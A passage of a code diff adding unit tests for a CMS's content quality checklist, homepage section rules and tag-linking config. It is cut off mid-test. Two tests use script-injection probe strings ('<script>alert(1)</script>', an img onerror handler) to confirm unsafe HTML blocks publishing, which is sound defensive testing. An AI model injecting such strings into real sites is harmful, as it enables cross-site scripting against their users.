+  title: "Hello",
+  slug: "hello",
+  excerpt: "Excerpt",
+  metaDescription: "Meta description",
+  contentText: "Body",
+  contentJson: { blocks: [{ type: "paragraph", text: "Body" }] },
+  featuredMediaId: null as string | null
+};
+
+describe("evaluateContentQualityChecklistForContent (Issue #640)", () => {
+  test("returns a non-applicable result when full-online R2-only mode is not active for the tenant", async () => {
+    const result = await evaluateContentQualityChecklistForContent(
+      FAKE_TX,
+      "tenant-a",
+      "post",
+      BASE_CONTENT,
+      0,
+      fakePort({ modeActive: false }),
+      {}
+    );
+
+    expect(result.applicable).toBe(false);
+    expect(result.passed).toBe(true);
+  });
+
+  test("resolves featuredMediaId through the port and passes when verified", async () => {
+    const result = await evaluateContentQualityChecklistForContent(
+      FAKE_TX,
+      "tenant-a",
+      "post",
+      { ...BASE_CONTENT, featuredMediaId: FEATURED_ID },
+      1,
+      fakePort({
+        modeActive: true,
+        resolvable: {
+          [FEATURED_ID]: {
+            publicUrl: "https://media.example.test/x.jpg",
+            altText: "Alt",
+            mimeType: "image/jpeg",
+            width: 800,
+            height: 600,
+            sizeBytes: 1000
+          }
+        }
+      }),
+      {}
+    );
+
+    expect(result.applicable).toBe(true);
+    expect(result.passed).toBe(true);
+    expect(result.blockers).toEqual([]);
+  });
+
+  test("blocks when featuredMediaId does not resolve (unverified/cross-tenant/nonexistent)", async () => {
+    const result = await evaluateContentQualityChecklistForContent(
+      FAKE_TX,
+      "tenant-a",
+      "post",
+      { ...BASE_CONTENT, featuredMediaId: FEATURED_ID },
+      1,
+      fakePort({ modeActive: true, resolvable: {} }),
+      {}
+    );
+
+    expect(result.passed).toBe(false);
+    expect(result.blockers.map((b) => b.ruleId)).toContain(
+      "featured_image_verified_r2"
+    );
+  });
+
+  test("resolves gallery mediaObjectIds via the port and blocks the unresolved one", async () => {
+    const result = await evaluateContentQualityChecklistForContent(
+      FAKE_TX,
+      "tenant-a",
+      "post",
+      {
+        ...BASE_CONTENT,
+        contentJson: {
+          blocks: [
+            {
+              type: "gallery",
+              items: [{ mediaType: "image", mediaObjectId: GALLERY_ID }]
+            }
+          ]
+        }
+      },
+      1,
+      fakePort({ modeActive: true, resolvable: {} }),
+      {}
+    );
+
+    expect(result.passed).toBe(false);
+    expect(result.blockers.map((b) => b.ruleId)).toContain(
+      "gallery_images_verified"
+    );
+  });
+
+  test("tenant policy override is applied through to the pure evaluator", async () => {
+    const result = await evaluateContentQualityChecklistForContent(
+      FAKE_TX,
+      "tenant-a",
+      "post",
+      { ...BASE_CONTENT, excerpt: null },
+      1,
+      fakePort({ modeActive: true }),
+      { excerpt_present: "blocking" }
+    );
+
+    expect(result.passed).toBe(false);
+    expect(result.blockers.map((b) => b.ruleId)).toContain("excerpt_present");
+  });
+
+  describe("Issue #649 — social preview image priority chain reuse", () => {
+    const SEO_IMAGE_ID = "33333333-3333-3333-3333-333333333333";
+    const TENANT_FALLBACK_ID = "44444444-4444-4444-4444-444444444444";
+
+    test("seoImageMediaId (explicit override) wins over featuredMediaId for the social_preview_image_* rules", async () => {
+      const result = await evaluateContentQualityChecklistForContent(
+        FAKE_TX,
+        "tenant-a",
+        "post",
+        {
+          ...BASE_CONTENT,
+          featuredMediaId: FEATURED_ID,
+          seoImageMediaId: SEO_IMAGE_ID
+        },
+        1,
+        fakePort({
+          modeActive: true,
+          resolvable: {
+            [FEATURED_ID]: {
+              publicUrl: "https://media.example.test/featured.jpg",
+              altText: null,
+              mimeType: "image/jpeg",
+              width: 800,
+              height: 600,
+              sizeBytes: 1000
+            },
+            [SEO_IMAGE_ID]: {
+              publicUrl: "https://media.example.test/seo.jpg",
+              altText: "SEO alt text",
+              mimeType: "image/jpeg",
+              width: 1200,
+              height: 630,
+              sizeBytes: 2000
+            }
+          }
+        }),
+        {}
+      );
+
+      // The explicit SEO image resolved WITH alt text, so both rules pass —
+      // if the featured image (no alt text) had won instead, the alt-text
+      // rule would have warned.
+      expect(
+        result.rules.find((r) => r.ruleId === "social_preview_image_ready")
+          ?.passed
+      ).toBe(true);
+      expect(
+        result.rules.find((r) => r.ruleId === "social_preview_image_alt_text")
+          ?.passed
+      ).toBe(true);
+    });
+
+    test("tenant fallback image is used when nothing else resolves", async () => {
+      const result = await evaluateContentQualityChecklistForContent(
+        FAKE_TX,
+        "tenant-a",
+        "post",
+        BASE_CONTENT,
+        1,
+        fakePort({
+          modeActive: true,
+          resolvable: {
+            [TENANT_FALLBACK_ID]: {
+              publicUrl: "https://media.example.test/fallback.jpg",
+              altText: "Fallback alt",
+              mimeType: "image/jpeg",
+              width: 1200,
+              height: 630,
+              sizeBytes: 2000
+            }
+          }
+        }),
+        {},
+        {
+          socialPreviewFallback: {
+            tenantFallbackImageMediaId: TENANT_FALLBACK_ID,
+            contentImageFallbackEnabled: true
+          }
+        }
+      );
+
+      expect(
+        result.rules.find((r) => r.ruleId === "social_preview_image_ready")
+          ?.passed
+      ).toBe(true);
+    });
+
+    test("no social preview image resolves when nothing is configured — warns, does not block", async () => {
+      const result = await evaluateContentQualityChecklistForContent(
+        FAKE_TX,
+        "tenant-a",
+        "post",
+        BASE_CONTENT,
+        1,
+        fakePort({ modeActive: true, resolvable: {} }),
+        {}
+      );
+
+      expect(result.passed).toBe(true);
+      expect(result.warnings.map((w) => w.ruleId)).toContain(
+        "social_preview_image_ready"
+      );
+    });
+  });
+});

--- a/tests/content-quality-checklist.test.ts
+++ b/tests/content-quality-checklist.test.ts
@@ -1,0 +1,424 @@
+/**
+ * Unit tests for the pure content quality checklist evaluator (Issue #640,
+ * epic `news_portal`). No database/port involved — `evaluateContentQuality
+ * Checklist` takes already-resolved inputs (the DB/port round trip is
+ * `content-quality-checklist-gate.ts`'s job, covered separately).
+ */
+import { describe, expect, test } from "bun:test";
+
+import {
+  evaluateContentQualityChecklist,
+  notApplicableChecklistResult,
+  SECURITY_RULE_IDS,
+  OVERRIDABLE_RULE_IDS,
+  isOverridableChecklistRuleId,
+  isValidChecklistSeverity,
+  type ContentQualityChecklistInput
+} from "../src/modules/blog-content/domain/content-quality-checklist";
+
+const NOW = new Date("2026-07-11T00:00:00.000Z");
+
+function baseInput(
+  overrides: Partial<ContentQualityChecklistInput> = {}
+): ContentQualityChecklistInput {
+  return {
+    contentKind: "post",
+    title: "Hello world",
+    slug: "hello-world",
+    excerpt: "An excerpt",
+    metaDescription: "A meta description",
+    contentText: "Body text",
+    contentJson: { blocks: [{ type: "paragraph", text: "Body text" }] },
+    featuredMediaId: null,
+    featuredMedia: null,
+    galleryViolations: [],
+    unsafeGalleryMediaObjectIds: [],
+    termCount: 1,
+    scheduledAt: null,
+    now: NOW,
+    socialPreviewImage: null,
+    ...overrides
+  };
+}
+
+describe("evaluateContentQualityChecklist (Issue #640)", () => {
+  test("a fully clean post with a verified featured image and gallery passes everything", () => {
+    const result = evaluateContentQualityChecklist(
+      baseInput({
+        featuredMediaId: "11111111-1111-1111-1111-111111111111",
+        featuredMedia: {
+          altText: "A description",
+          width: 1200,
+          height: 630,
+          mimeType: "image/jpeg",
+          sizeBytes: 123_456
+        },
+        // Issue #649 — in a real gate call, this mirrors whichever image
+        // the priority chain picked; here it resolves to the same featured
+        // image (with alt text), so the social preview rules also pass.
+        socialPreviewImage: { altText: "A description" }
+      })
+    );
+
+    expect(result.applicable).toBe(true);
+    expect(result.passed).toBe(true);
+    expect(result.blockers).toEqual([]);
+    expect(result.warnings).toEqual([]);
+  });
+
+  test("missing title/slug/excerpt/meta description/taxonomy/featured image all report but do not block (except title/slug, which cannot actually occur since they're mandatory elsewhere)", () => {
+    const result = evaluateContentQualityChecklist(
+      baseInput({ excerpt: null, metaDescription: null, termCount: 0 })
+    );
+
+    expect(result.passed).toBe(true);
+    const warningRuleIds = result.warnings.map((w) => w.ruleId);
+    expect(warningRuleIds).toContain("excerpt_present");
+    expect(warningRuleIds).toContain("meta_description_present");
+    expect(warningRuleIds).toContain("taxonomy_exists");
+    expect(warningRuleIds).toContain("featured_image_exists");
+  });
+
+  test("taxonomy_exists is never applicable for pages", () => {
+    const result = evaluateContentQualityChecklist(
+      baseInput({ contentKind: "page", termCount: 0 })
+    );
+
+    const taxonomyRule = result.rules.find(
+      (r) => r.ruleId === "taxonomy_exists"
+    );
+    expect(taxonomyRule?.applicable).toBe(false);
+    expect(taxonomyRule?.passed).toBe(true);
+  });
+
+  test("unsafe HTML in contentText blocks publish", () => {
+    const result = evaluateContentQualityChecklist(
+      baseInput({ contentText: "<script>alert(1)</script>" })
+    );
+
+    expect(result.passed).toBe(false);
+    expect(result.blockers.map((b) => b.ruleId)).toContain(
+      "unsafe_html_rejected"
+    );
+  });
+
+  test("unsafe HTML in contentJson blocks publish", () => {
+    const result = evaluateContentQualityChecklist(
+      baseInput({
+        contentJson: {
+          blocks: [{ type: "paragraph", text: '<img onerror="alert(1)">' }]
+        }
+      })
+    );
+
+    expect(result.passed).toBe(false);
+    expect(result.blockers.map((b) => b.ruleId)).toContain(
+      "unsafe_html_rejected"
+    );
+  });
+
+  test("featured image present but unresolved (unverified/cross-tenant/nonexistent) blocks publish", () => {
+    const result = evaluateContentQualityChecklist(
+      baseInput({
+        featuredMediaId: "11111111-1111-1111-1111-111111111111",
+        featuredMedia: null
+      })
+    );
+
+    expect(result.passed).toBe(false);
+    expect(result.blockers.map((b) => b.ruleId)).toContain(
+      "featured_image_verified_r2"
+    );
+    // Downstream rules that need resolved metadata are not applicable, not silently passing as if checked.
+    const altRule = result.rules.find(
+      (r) => r.ruleId === "featured_image_alt_text"
+    );
+    expect(altRule?.applicable).toBe(false);
+  });
+
+  test("no featured image at all is not blocking by default (only a warning)", () => {
+    const result = evaluateContentQualityChecklist(baseInput());
+    expect(result.passed).toBe(true);
+    expect(result.warnings.map((w) => w.ruleId)).toContain(
+      "featured_image_exists"
+    );
+  });
+
+  test("featured image missing alt text/dimensions is a warning by default, not blocking", () => {
+    const result = evaluateContentQualityChecklist(
+      baseInput({
+        featuredMediaId: "11111111-1111-1111-1111-111111111111",
+        featuredMedia: {
+          altText: null,
+          width: null,
+          height: null,
+          mimeType: "image/png",
+          sizeBytes: 100
+        }
+      })
+    );
+
+    expect(result.passed).toBe(true);
+    const warningIds = result.warnings.map((w) => w.ruleId);
+    expect(warningIds).toContain("featured_image_alt_text");
+    expect(warningIds).toContain("featured_image_dimensions");
+  });
+
+  test("tenant policy can escalate featured_image_alt_text to blocking", () => {
+    const result = evaluateContentQualityChecklist(
+      baseInput({
+        featuredMediaId: "11111111-1111-1111-1111-111111111111",
+        featuredMedia: {
+          altText: null,
+          width: 100,
+          height: 100,
+          mimeType: "image/png",
+          sizeBytes: 100
+        }
+      }),
+      { featured_image_alt_text: "blocking" }
+    );
+
+    expect(result.passed).toBe(false);
+    expect(result.blockers.map((b) => b.ruleId)).toContain(
+      "featured_image_alt_text"
+    );
+  });
+
+  test("tenant policy CANNOT downgrade a security rule id (unsafe_html_rejected) — override is ignored", () => {
+    const result = evaluateContentQualityChecklist(
+      baseInput({ contentText: "<script>alert(1)</script>" }),
+      // Cast bypasses the TS type restriction to prove the runtime guard
+      // itself (not just the type system) refuses to honor this.
+      { unsafe_html_rejected: "info" } as never
+    );
+
+    expect(result.passed).toBe(false);
+    const rule = result.rules.find((r) => r.ruleId === "unsafe_html_rejected");
+    expect(rule?.severity).toBe("blocking");
+  });
+
+  test("a gallery item with a local raw path is blocked via no_local_image_path", () => {
+    const result = evaluateContentQualityChecklist(
+      baseInput({
+        galleryViolations: [
+          {
+            itemIndex: 0,
+            reason: "raw_url_not_allowed",
+            rawUrl: "/uploads/photo.jpg"
+          }
+        ]
+      })
+    );
+
+    expect(result.passed).toBe(false);
+    expect(result.blockers.map((b) => b.ruleId)).toContain(
+      "no_local_image_path"
+    );
+    expect(result.blockers.map((b) => b.ruleId)).not.toContain(
+      "no_external_image_url"
+    );
+  });
+
+  test("a gallery item with an arbitrary external URL is blocked via no_external_image_url", () => {
+    const result = evaluateContentQualityChecklist(
+      baseInput({
+        galleryViolations: [
+          {
+            itemIndex: 0,
+            reason: "raw_url_not_allowed",
+            rawUrl: "https://example.com/photo.jpg"
+          }
+        ]
+      })
+    );
+
+    expect(result.passed).toBe(false);
+    expect(result.blockers.map((b) => b.ruleId)).toContain(
+      "no_external_image_url"
+    );
+    expect(result.blockers.map((b) => b.ruleId)).not.toContain(
+      "no_local_image_path"
+    );
+  });
+
+  test("a gallery item with a malformed/missing mediaObjectId blocks via gallery_images_verified", () => {
+    const result = evaluateContentQualityChecklist(
+      baseInput({
+        galleryViolations: [
+          { itemIndex: 0, reason: "media_object_id_missing_or_malformed" }
+        ]
+      })
+    );
+
+    expect(result.passed).toBe(false);
+    expect(result.blockers.map((b) => b.ruleId)).toContain(
+      "gallery_images_verified"
+    );
+  });
+
+  test("a well-formed gallery mediaObjectId that failed to resolve safely blocks via gallery_images_verified", () => {
+    const result = evaluateContentQualityChecklist(
+      baseInput({
+        unsafeGalleryMediaObjectIds: ["11111111-1111-1111-1111-111111111111"]
+      })
+    );
+
+    expect(result.passed).toBe(false);
+    expect(result.blockers.map((b) => b.ruleId)).toContain(
+      "gallery_images_verified"
+    );
+  });
+
+  test("scheduled_publish_time_valid is not applicable outside a scheduling request", () => {
+    const result = evaluateContentQualityChecklist(baseInput());
+    const rule = result.rules.find(
+      (r) => r.ruleId === "scheduled_publish_time_valid"
+    );
+    expect(rule?.applicable).toBe(false);
+  });
+
+  test("scheduled_publish_time_valid blocks a scheduledAt that is not in the future", () => {
+    const result = evaluateContentQualityChecklist(
+      baseInput({ scheduledAt: new Date(NOW.getTime() - 1000) })
+    );
+
+    expect(result.passed).toBe(false);
+    expect(result.blockers.map((b) => b.ruleId)).toContain(
+      "scheduled_publish_time_valid"
+    );
+  });
+
+  test("scheduled_publish_time_valid passes a future scheduledAt", () => {
+    const result = evaluateContentQualityChecklist(
+      baseInput({ scheduledAt: new Date(NOW.getTime() + 1000) })
+    );
+
+    const rule = result.rules.find(
+      (r) => r.ruleId === "scheduled_publish_time_valid"
+    );
+    expect(rule?.applicable).toBe(true);
+    expect(rule?.passed).toBe(true);
+  });
+
+  describe("social_preview_image_ready / social_preview_image_alt_text (Issue #649)", () => {
+    test("warns (does not block) when no social preview image resolved from any source", () => {
+      const result = evaluateContentQualityChecklist(
+        baseInput({ socialPreviewImage: null })
+      );
+
+      expect(result.passed).toBe(true);
+      expect(result.warnings.map((w) => w.ruleId)).toContain(
+        "social_preview_image_ready"
+      );
+      const altRule = result.rules.find(
+        (r) => r.ruleId === "social_preview_image_alt_text"
+      );
+      expect(altRule?.applicable).toBe(false);
+      expect(altRule?.passed).toBe(true);
+    });
+
+    test("passes social_preview_image_ready and warns on missing alt text when an image resolved without alt text", () => {
+      const result = evaluateContentQualityChecklist(
+        baseInput({ socialPreviewImage: { altText: null } })
+      );
+
+      const readyRule = result.rules.find(
+        (r) => r.ruleId === "social_preview_image_ready"
+      );
+      expect(readyRule?.passed).toBe(true);
+      expect(result.warnings.map((w) => w.ruleId)).toContain(
+        "social_preview_image_alt_text"
+      );
+    });
+
+    test("passes both rules when an image with alt text resolved", () => {
+      const result = evaluateContentQualityChecklist(
+        baseInput({ socialPreviewImage: { altText: "A description" } })
+      );
+
+      expect(
+        result.rules.find((r) => r.ruleId === "social_preview_image_ready")
+          ?.passed
+      ).toBe(true);
+      expect(
+        result.rules.find((r) => r.ruleId === "social_preview_image_alt_text")
+          ?.passed
+      ).toBe(true);
+      expect(result.warnings.map((w) => w.ruleId)).not.toContain(
+        "social_preview_image_ready"
+      );
+      expect(result.warnings.map((w) => w.ruleId)).not.toContain(
+        "social_preview_image_alt_text"
+      );
+    });
+
+    test("both rules are overridable (not security blockers)", () => {
+      expect(OVERRIDABLE_RULE_IDS).toContain("social_preview_image_ready");
+      expect(OVERRIDABLE_RULE_IDS).toContain("social_preview_image_alt_text");
+      expect(SECURITY_RULE_IDS).not.toContain("social_preview_image_ready");
+      expect(SECURITY_RULE_IDS).not.toContain("social_preview_image_alt_text");
+    });
+
+    test("tenant policy override can downgrade social_preview_image_ready to info", () => {
+      const result = evaluateContentQualityChecklist(
+        baseInput({ socialPreviewImage: null }),
+        { social_preview_image_ready: "info" }
+      );
+
+      expect(
+        result.rules.find((r) => r.ruleId === "social_preview_image_ready")
+          ?.severity
+      ).toBe("info");
+      expect(result.warnings.map((w) => w.ruleId)).not.toContain(
+        "social_preview_image_ready"
+      );
+      expect(result.info.map((i) => i.ruleId)).toContain(
+        "social_preview_image_ready"
+      );
+    });
+  });
+});
+
+describe("notApplicableChecklistResult (Issue #640)", () => {
+  test("returns an all-empty, passed, non-applicable result", () => {
+    const result = notApplicableChecklistResult();
+    expect(result).toEqual({
+      applicable: false,
+      passed: true,
+      rules: [],
+      blockers: [],
+      warnings: [],
+      info: []
+    });
+  });
+});
+
+describe("SECURITY_RULE_IDS / OVERRIDABLE_RULE_IDS never overlap (Issue #640)", () => {
+  test("no rule id appears in both lists", () => {
+    const overlap = SECURITY_RULE_IDS.filter((id) =>
+      (OVERRIDABLE_RULE_IDS as readonly string[]).includes(id)
+    );
+    expect(overlap).toEqual([]);
+  });
+});
+
+describe("isOverridableChecklistRuleId / isValidChecklistSeverity (Issue #640)", () => {
+  test("accepts every declared overridable rule id, rejects a security rule id", () => {
+    for (const ruleId of OVERRIDABLE_RULE_IDS) {
+      expect(isOverridableChecklistRuleId(ruleId)).toBe(true);
+    }
+    for (const ruleId of SECURITY_RULE_IDS) {
+      expect(isOverridableChecklistRuleId(ruleId)).toBe(false);
+    }
+    expect(isOverridableChecklistRuleId("not_a_real_rule")).toBe(false);
+  });
+
+  test("accepts blocking/warning/info, rejects anything else", () => {
+    expect(isValidChecklistSeverity("blocking")).toBe(true);
+    expect(isValidChecklistSeverity("warning")).toBe(true);
+    expect(isValidChecklistSeverity("info")).toBe(true);
+    expect(isValidChecklistSeverity("critical")).toBe(false);
+    expect(isValidChecklistSeverity(undefined)).toBe(false);
+  });
+});

--- a/tests/homepage-section-policy.test.ts
+++ b/tests/homepage-section-policy.test.ts
@@ -1,0 +1,262 @@
+import { describe, expect, test } from "bun:test";
+
+import {
+  HOMEPAGE_SECTION_TYPES,
+  isHomepageSectionType,
+  validateCreateHomepageSectionInput,
+  validateHomepageSectionConfig,
+  validateUpdateHomepageSectionInput
+} from "../src/modules/news-portal/domain/homepage-section-policy";
+
+const VALID_ID = "11111111-1111-1111-1111-111111111111";
+const VALID_ID_2 = "22222222-2222-2222-2222-222222222222";
+
+describe("isHomepageSectionType (Issue #637)", () => {
+  test("accepts every declared type", () => {
+    for (const type of HOMEPAGE_SECTION_TYPES) {
+      expect(isHomepageSectionType(type)).toBe(true);
+    }
+  });
+
+  test("rejects unknown/deferred types (video_block, ad_slot, custom_widget_block, static_page_block)", () => {
+    for (const type of [
+      "video_block",
+      "ad_slot",
+      "custom_widget_block",
+      "static_page_block",
+      "not_a_type",
+      123,
+      null
+    ]) {
+      expect(isHomepageSectionType(type)).toBe(false);
+    }
+  });
+});
+
+describe("validateHomepageSectionConfig (Issue #637)", () => {
+  test("headline requires a UUID postId", () => {
+    const errors: { field: string; message: string }[] = [];
+    expect(
+      validateHomepageSectionConfig("headline", { postId: VALID_ID }, errors)
+    ).toEqual({ postId: VALID_ID });
+    expect(errors).toEqual([]);
+
+    const badErrors: { field: string; message: string }[] = [];
+    expect(
+      validateHomepageSectionConfig(
+        "headline",
+        { postId: "not-a-uuid" },
+        badErrors
+      )
+    ).toBeNull();
+    expect(badErrors.length).toBeGreaterThan(0);
+  });
+
+  test("latest_posts defaults limit and allows optional categorySlug", () => {
+    const errors: { field: string; message: string }[] = [];
+    expect(validateHomepageSectionConfig("latest_posts", {}, errors)).toEqual({
+      limit: 5,
+      categorySlug: null
+    });
+    expect(errors).toEqual([]);
+
+    const errors2: { field: string; message: string }[] = [];
+    expect(
+      validateHomepageSectionConfig(
+        "latest_posts",
+        { limit: 10, categorySlug: "world" },
+        errors2
+      )
+    ).toEqual({ limit: 10, categorySlug: "world" });
+  });
+
+  test("latest_posts rejects limit out of bounds", () => {
+    const errors: { field: string; message: string }[] = [];
+    expect(
+      validateHomepageSectionConfig("latest_posts", { limit: 0 }, errors)
+    ).toBeNull();
+    expect(errors.length).toBeGreaterThan(0);
+
+    const errors2: { field: string; message: string }[] = [];
+    expect(
+      validateHomepageSectionConfig("latest_posts", { limit: 21 }, errors2)
+    ).toBeNull();
+    expect(errors2.length).toBeGreaterThan(0);
+  });
+
+  test("featured_posts/editor_picks require a non-empty postIds array of UUIDs", () => {
+    const errors: { field: string; message: string }[] = [];
+    expect(
+      validateHomepageSectionConfig(
+        "featured_posts",
+        { postIds: [VALID_ID, VALID_ID_2] },
+        errors
+      )
+    ).toEqual({ postIds: [VALID_ID, VALID_ID_2] });
+
+    const errors2: { field: string; message: string }[] = [];
+    expect(
+      validateHomepageSectionConfig("editor_picks", { postIds: [] }, errors2)
+    ).toBeNull();
+    expect(errors2.length).toBeGreaterThan(0);
+
+    const errors3: { field: string; message: string }[] = [];
+    expect(
+      validateHomepageSectionConfig(
+        "featured_posts",
+        { postIds: ["not-a-uuid"] },
+        errors3
+      )
+    ).toBeNull();
+    expect(errors3.length).toBeGreaterThan(0);
+  });
+
+  test("category_grid requires categorySlugs and defaults postsPerCategory", () => {
+    const errors: { field: string; message: string }[] = [];
+    expect(
+      validateHomepageSectionConfig(
+        "category_grid",
+        { categorySlugs: ["world", "sports"] },
+        errors
+      )
+    ).toEqual({ categorySlugs: ["world", "sports"], postsPerCategory: 3 });
+
+    const errors2: { field: string; message: string }[] = [];
+    expect(
+      validateHomepageSectionConfig(
+        "category_grid",
+        { categorySlugs: [] },
+        errors2
+      )
+    ).toBeNull();
+    expect(errors2.length).toBeGreaterThan(0);
+
+    const errors3: { field: string; message: string }[] = [];
+    expect(
+      validateHomepageSectionConfig(
+        "category_grid",
+        { categorySlugs: ["a"], postsPerCategory: 7 },
+        errors3
+      )
+    ).toBeNull();
+    expect(errors3.length).toBeGreaterThan(0);
+  });
+
+  test("gallery_block requires a non-empty mediaObjectIds array and allows optional caption", () => {
+    const errors: { field: string; message: string }[] = [];
+    expect(
+      validateHomepageSectionConfig(
+        "gallery_block",
+        { mediaObjectIds: [VALID_ID], caption: "Gallery" },
+        errors
+      )
+    ).toEqual({ mediaObjectIds: [VALID_ID], caption: "Gallery" });
+
+    const errors2: { field: string; message: string }[] = [];
+    expect(
+      validateHomepageSectionConfig(
+        "gallery_block",
+        { mediaObjectIds: [] },
+        errors2
+      )
+    ).toBeNull();
+    expect(errors2.length).toBeGreaterThan(0);
+  });
+});
+
+describe("validateCreateHomepageSectionInput (Issue #637)", () => {
+  test("accepts a well-formed headline section with defaults", () => {
+    const result = validateCreateHomepageSectionInput({
+      sectionKey: "front-page-headline",
+      sectionType: "headline",
+      config: { postId: VALID_ID }
+    });
+
+    expect(result.valid).toBe(true);
+    if (result.valid) {
+      expect(result.value.sectionKey).toBe("front-page-headline");
+      expect(result.value.sortOrder).toBe(0);
+      expect(result.value.isEnabled).toBe(true);
+      expect(result.value.startsAt).toBeNull();
+      expect(result.value.endsAt).toBeNull();
+    }
+  });
+
+  test("rejects a sectionKey that doesn't match the slug pattern", () => {
+    const result = validateCreateHomepageSectionInput({
+      sectionKey: "Not A Valid Key!",
+      sectionType: "headline",
+      config: { postId: VALID_ID }
+    });
+    expect(result.valid).toBe(false);
+  });
+
+  test("rejects an unknown sectionType", () => {
+    const result = validateCreateHomepageSectionInput({
+      sectionKey: "front-page",
+      sectionType: "video_block",
+      config: {}
+    });
+    expect(result.valid).toBe(false);
+  });
+
+  test("rejects endsAt before startsAt", () => {
+    const result = validateCreateHomepageSectionInput({
+      sectionKey: "front-page",
+      sectionType: "latest_posts",
+      config: {},
+      startsAt: "2026-02-01T00:00:00.000Z",
+      endsAt: "2026-01-01T00:00:00.000Z"
+    });
+    expect(result.valid).toBe(false);
+  });
+
+  test("rejects config that doesn't match the declared sectionType's shape", () => {
+    const result = validateCreateHomepageSectionInput({
+      sectionKey: "front-page",
+      sectionType: "gallery_block",
+      config: { postId: VALID_ID }
+    });
+    expect(result.valid).toBe(false);
+  });
+});
+
+describe("validateUpdateHomepageSectionInput (Issue #637)", () => {
+  test("allows a partial update touching only isEnabled", () => {
+    const result = validateUpdateHomepageSectionInput(
+      { isEnabled: false },
+      "headline"
+    );
+    expect(result).toEqual({ valid: true, value: { isEnabled: false } });
+  });
+
+  test("validates config against the CURRENT sectionType, not a client-supplied one", () => {
+    const result = validateUpdateHomepageSectionInput(
+      { config: { mediaObjectIds: [VALID_ID] } },
+      "gallery_block"
+    );
+    expect(result.valid).toBe(true);
+    if (result.valid) {
+      expect(result.value.config).toEqual({
+        mediaObjectIds: [VALID_ID],
+        caption: null
+      });
+    }
+  });
+
+  test("rejects an attempt to change sectionType", () => {
+    const result = validateUpdateHomepageSectionInput(
+      { sectionType: "gallery_block" },
+      "headline"
+    );
+    expect(result.valid).toBe(false);
+  });
+
+  test("rejects config that doesn't match the current sectionType's shape", () => {
+    const result = validateUpdateHomepageSectionInput(
+      { config: { postId: VALID_ID } },
+      "gallery_block"
+    );
+    expect(result.valid).toBe(false);
+  });
+});

--- a/tests/internal-tag-linking-config.test.ts
+++ b/tests/internal-tag-linking-config.test.ts
@@ -1,0 +1,71 @@
+import { describe, expect, test } from "bun:test";
+
+import {
+  BLOG_AUTO_INTERNAL_TAG_LINKS_DEFAULTS,
+  findBlogAutoInternalTagLinksConfigIssues,
+  resolveBlogAutoInternalTagLinksConfig
+} from "../src/modules/blog-content/domain/internal-tag-linking-config";
+
+describe("resolveBlogAutoInternalTagLinksConfig", () => {
+  test("returns defaults when nothing is set", () => {
+    const config = resolveBlogAutoInternalTagLinksConfig({});
+    expect(config).toEqual(BLOG_AUTO_INTERNAL_TAG_LINKS_DEFAULTS);
+  });
+
+  test("parses every var when set", () => {
+    const config = resolveBlogAutoInternalTagLinksConfig({
+      BLOG_AUTO_INTERNAL_TAG_LINKS_ENABLED: "false",
+      BLOG_AUTO_INTERNAL_TAG_LINKS_MAX_PER_POST: "20",
+      BLOG_AUTO_INTERNAL_TAG_LINKS_MAX_PER_TAG: "3",
+      BLOG_AUTO_INTERNAL_TAG_LINKS_MIN_TERM_LENGTH: "5",
+      BLOG_AUTO_INTERNAL_TAG_LINKS_LINK_FIRST_OCCURRENCE_ONLY: "false",
+      BLOG_AUTO_INTERNAL_TAG_LINKS_EXCLUDE_HEADINGS: "false"
+    } as NodeJS.ProcessEnv);
+
+    expect(config).toEqual({
+      enabled: false,
+      maxPerPost: 20,
+      maxPerTag: 3,
+      minTermLength: 5,
+      linkFirstOccurrenceOnly: false,
+      excludeHeadings: false
+    });
+  });
+
+  test("falls back to default for a malformed integer", () => {
+    const config = resolveBlogAutoInternalTagLinksConfig({
+      BLOG_AUTO_INTERNAL_TAG_LINKS_MAX_PER_POST: "not-a-number"
+    } as NodeJS.ProcessEnv);
+
+    expect(config.maxPerPost).toBe(
+      BLOG_AUTO_INTERNAL_TAG_LINKS_DEFAULTS.maxPerPost
+    );
+  });
+});
+
+describe("findBlogAutoInternalTagLinksConfigIssues", () => {
+  test("empty for defaults", () => {
+    expect(findBlogAutoInternalTagLinksConfigIssues({})).toEqual([]);
+  });
+
+  test("flags an out-of-range maxPerPost", () => {
+    const issues = findBlogAutoInternalTagLinksConfigIssues({
+      BLOG_AUTO_INTERNAL_TAG_LINKS_MAX_PER_POST: "500"
+    } as NodeJS.ProcessEnv);
+    expect(issues).toContain("max_per_post_out_of_range");
+  });
+
+  test("flags an out-of-range maxPerTag", () => {
+    const issues = findBlogAutoInternalTagLinksConfigIssues({
+      BLOG_AUTO_INTERNAL_TAG_LINKS_MAX_PER_TAG: "50"
+    } as NodeJS.ProcessEnv);
+    expect(issues).toContain("max_per_tag_out_of_range");
+  });
+
+  test("flags an out-of-range minTermLength", () => {
+    const issues = findBlogAutoInternalTagLinksConfigIssues({
+      BLOG_AUTO_INTERNAL_TAG_LINKS_MIN_TERM_LENGTH: "500"
+    } as NodeJS.ProcessEnv);
+    expect(issues).toContain("min_term_length_out_of_range");
+  });
+});

--- a/tests/internal-tag-linking-policy.test.ts
+++ b/tests/internal-tag-linking-policy.test.ts
@@ -1,0 +1,87 @@
+import { describe, expect, test } from "bun:test";
+
+import {
+  isValidUuid,
+  validateUpdateInternalTagLinkingSettingsInput
+} from "../src/modules/blog-content/domain/internal-tag-linking-policy";
+
+const VALID_UUID = "11111111-1111-1111-1111-111111111111";
+
+describe("validateUpdateInternalTagLinkingSettingsInput", () => {
+  test("accepts an empty body (no-op partial update)", () => {
+    const result = validateUpdateInternalTagLinkingSettingsInput({});
+    expect(result.valid).toBe(true);
+    if (result.valid) {
+      expect(result.value).toEqual({});
+    }
+  });
+
+  test("accepts enabled/caseInsensitive booleans", () => {
+    const result = validateUpdateInternalTagLinkingSettingsInput({
+      enabled: false,
+      caseInsensitive: true
+    });
+    expect(result.valid).toBe(true);
+    if (result.valid) {
+      expect(result.value).toEqual({ enabled: false, caseInsensitive: true });
+    }
+  });
+
+  test("rejects a non-boolean enabled", () => {
+    const result = validateUpdateInternalTagLinkingSettingsInput({
+      enabled: "yes"
+    });
+    expect(result.valid).toBe(false);
+  });
+
+  test("rejects a non-boolean caseInsensitive", () => {
+    const result = validateUpdateInternalTagLinkingSettingsInput({
+      caseInsensitive: 1
+    });
+    expect(result.valid).toBe(false);
+  });
+
+  test("accepts a valid disabledTagIds array and de-duplicates it", () => {
+    const result = validateUpdateInternalTagLinkingSettingsInput({
+      disabledTagIds: [VALID_UUID, VALID_UUID]
+    });
+    expect(result.valid).toBe(true);
+    if (result.valid) {
